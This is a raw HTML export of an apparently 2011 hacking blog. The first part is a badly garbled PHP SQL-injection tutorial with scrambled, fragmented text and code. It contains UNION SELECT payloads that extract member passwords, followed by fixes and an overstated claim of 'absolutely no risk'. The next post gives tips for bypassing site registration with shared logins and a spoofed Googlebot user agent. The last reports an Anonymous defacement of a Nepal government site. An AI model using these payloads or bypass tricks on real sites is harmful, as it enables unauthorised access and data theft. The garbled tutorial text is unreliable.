</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>s you have noticed </b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>#####################</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
A</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>#in previous injection, the attacker uses the quote</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>(to close the 'around $ nick): if she is prevented from doing that, the</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>bad boy will only have to look elsewhere . This means that if one</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>is ...</b></span><b>
</b><b>++++++++++++++++++++++++++++++++++++++++++++++++++++...
</b><b>
</b><b>+$pseudo</b><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>applies a mysql_real_escape_string () to the variable name like t</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>h = mysql_real_escape_string($_GET['pseudo']);</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>$requete = mysql_query("SELECT age FROM membres WHERE pseudo='$pseudo'");</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>...
<div style="text-align: right;"></div>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>The application is completely secure.</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>Explanation</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>#####################
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>#</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>##############</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>Injection hacker to recall:</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
+</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>######</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
#</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>#++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>' UNION SELECT password FROM membres WHERE id=1</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>Well if we apply mysql_real_escape_string () to the variable $ name used</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>in the query is what will the injection:</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>++++++++++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">+</span></b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>\' UNION SELECT password FROM membres WHERE id=1</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>This means that we do not even come out of assessments around $ nick in</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>the request because the \ has been added. There is another function</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>y</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>not have used? Well recently, a security hole was discovered on thi</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>somewhat similar to mysql_real_escape_string () is addslashes (), w</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>hs if</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>it is used on a PHP 4.3.9 installation with magic_quotes_gpc enabled.</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
######################
Numeric variables:
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>rts as just now with a</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>######################</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>his type of injection is less known than the previous one, making it
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>Tmore frequent, and it st</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">an example. This time, it</span></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">displays the age of a member according to its id, and by passing it by a</span></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">form ($ _POST) to change:
</span></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>OM membres WHERE id=$id");</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>...
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++...</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++
+</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
$id = $_POST['id'];
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>y("SELECT age F</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>$requete = mysql_que
r</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>R++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>mysql_real_escape_string () would be nothing here, since if an attacker</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>wants to inject SQL code, it will not need to use quotes, because the</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>ion:</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>variable $ id is not surrounded by quotes. Simple example of</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
+</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>xploita</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
e</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>t++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>2 UNION SELECT password FROM membres WHERE id=1</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>This injection did exactly the same as the previous one, except that</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>here, to avoid it, there are two solutions:</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>ontains only numbers;</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>* Check if the variable actually contains a </b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>* Change the contents of the variable so it </b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">cnumber before using it in a query.</span></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>
##########
Method 1:
##########
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>he</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>contents of a variable its numerical value. For example:</b></span><b>
</b><b>++++++++++</b><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>We'll use a function , intval () This function returns regardless of </b></span><b>
+</b><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>t++++++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>$variable = '1e10'; // $variable vaut '1e10'</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>$valeur_numerique = intval($variable); // $valeur_numerique vaut 1</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>Now back to our sheep:</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><div style="text-align: center;"><span class="Apple-style-span" style="font-size: 14px; font-weight: bold; line-height: 20px;">
</span></div></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>$id = intval($_POST['id']);</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>$requete = mysql_query("SELECT age FROM membres WHERE id=$id");</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>}</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>That is: you can stop there and is more than enough, but I recommend you</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>continue to find another method, or you have air beast if you find this</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>Méthode 2:</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>###########</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>ere we use a function that retur</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>method on a code that is not yours without understand it.</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
H</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
############
ns TRUE when a variable contains only
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>cks whether is_numeric ( ) returns</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>TRUE well.
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>++++++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>numbers and FALSE if it is not the case this function is is_numeric (),</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>+++++++++++
+</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>e will use it in a condition that ch</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
w</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>e+++++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>$id = $_POST['id'];</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>if (is_numeric($id))</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>{</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>equete = mysql_query("SELECT age FROM membres WHERE id=$id");</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>}</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>$</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>r</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>else</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>{
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>ing to hack me ? Your ip is recorded Ksecurity-Team";</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>++++++++</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>echo "Tr</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>y+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++</b></span></pre><pre><div style="text-align: center;"><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>##################################################################</b></span></div><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>What is the best, depending intval () and is_numeric ()?</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>#########</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>ell I will say that they are both equally effective, t</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>########################################################</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
W</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>
</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>#hey are equal.</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>But I prefer inval () since with is_numeric () write more code, and if</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>of course you can run the same query by choosing an</b></span><b>default value for t</b><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>the variable does not contain only numbers, the request is canceled (in</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>principle, but</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;"> he variable used). Well that's it! You know all about</span></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b>securing your applications. If you apply these methods, there is</b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><div style="font-size: 14px; line-height: 20px; text-align: right;"></div></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">absolutely no risk of having a fault type SQL injection on its website</span></b></span><span class="Apple-style-span" style="color: #403f3f; font-family: Arial, Helvetica, sans-serif;"><b><div style="font-size: 14px; line-height: 20px; text-align: right;"></div><span class="Apple-style-span" style="font-size: 14px; line-height: 20px;">(or PHP).</span></b></span></pre></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-52693554453246567712011-07-29T00:24:00.000-07:002011-07-29T00:24:44.126-07:00Free Access To Websites Without Registering<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="color: #333333; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px;">Go to<br />
<br />
-<a href="http://bugmenot.com/" rel="nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://bugmenot.com/</a><br />
<br />
and type the URL of the website you want to log into.<br />
<span class="text_exposed_show" style="display: inline;">Examples:<br />
<br />
-<a href="http://www.nytimes.com/" rel="nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://www.nytimes.com/</a>, -<a href="http://www.winnetmag.com/" rel="nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://www.winnetmag.com/</a><br />
etcetera.<br />
<br />
Another (and better) way is changing the user agent of your browser to:<br />
Googlebot/2.1+<br />
<br />
-<a href="http://www.googlebot.com/bot.html" rel="nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://www.googlebot.com/b<wbr></wbr>ot.html</a><br />
<br />
This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from<br />
<br />
-<a href="http://www.chrispederick.com/work/firefox/useragentswitcher/" rel="nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://www.chrispederick.c<wbr></wbr>om/work/firefox/useragents<wbr></wbr>witcher/</a><br />
and add the Googlebot user agent.<br />
<br />
Have fun, Dead Dreamer!<br />
<br />
-]Edit[- Now this kicks ass, was just browsing entire forum without even needing to login to view restricted areas, and it works on other sites<br />
And no, you cant access the hidden forums either, already tried that<br />
Bugmenot.com - login with these free web passwords to bypass compulsory registration<br />
bugmenot.com<br />
Access and share logins for websites that require you to register in order to view content.</span></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-72530684861373038202011-05-22T23:48:00.000-07:002011-05-22T23:48:51.672-07:00HACKED-Nepal Government’s official website nepalgov.gov.np HACKED<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR4AxZEMZSvVFWF6IVZR7_TyitlY3x6feAUeSxJS6i0PziTAOixqlaYyvm16I0dP3qRSc1xmhg1bt9fMhMR7OE3OFTsRPXrNCY42ai4oAaQX8ILPqaHmiKaiNRpgZaM87eVDC4sQ9wJaQ/s1600/NEPAL+GOV%2527S+WEBSITE+HACKED.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR4AxZEMZSvVFWF6IVZR7_TyitlY3x6feAUeSxJS6i0PziTAOixqlaYyvm16I0dP3qRSc1xmhg1bt9fMhMR7OE3OFTsRPXrNCY42ai4oAaQX8ILPqaHmiKaiNRpgZaM87eVDC4sQ9wJaQ/s320/NEPAL+GOV%2527S+WEBSITE+HACKED.jpg" width="320" /></a></div><br />
<div class="smallfont" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px; font: normal normal normal 11px/normal verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; text-align: center;"><strong>OpEverest has hacked the Nepal Government’s official website nepalgov.gov.np</strong></div><hr size="1" style="background-color: #d1d1e1; color: #d1d1e1; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px; text-align: center;" /><div id="post_message_61663"><div style="float: right; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"></div><div style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px; text-align: center;">An ‘Anonymous’ group named #<b>OpEverest has hacked the Nepal Government’s official website nepalgov.gov.np</b>. The group says that the extreme measure was done to draw attention towards corruption, internet spying, internet filter, and mismanagement in Nepal. The DDos attack on the website confirm the impact of this letter (click on the image on the right to enlarge it). The letter mentions various other government and political party websites as their next target.</div><div style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px; text-align: center;">I am surprised how could they attack some website to fulfill such clueless demands. Nobody knows how to fulfil these demands. The letter says: reduce corruption – everybody is saying that and the government has also punished some corrupt people (a show-off). It can’t be done by a magic wand. Missmanagement – what is that? How does one know if they are spying internet or not? And internet filtering can be stopped. But, is this the right way to demand such things?</div><div style="text-align: center;"><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"><br />
</span></div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 15px;"><div style="text-align: center;"><img alt="" border="0" src="http://farm3.static.flickr.com/2053/2117758020_9c32db9fdb.jpg" /></div></span><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
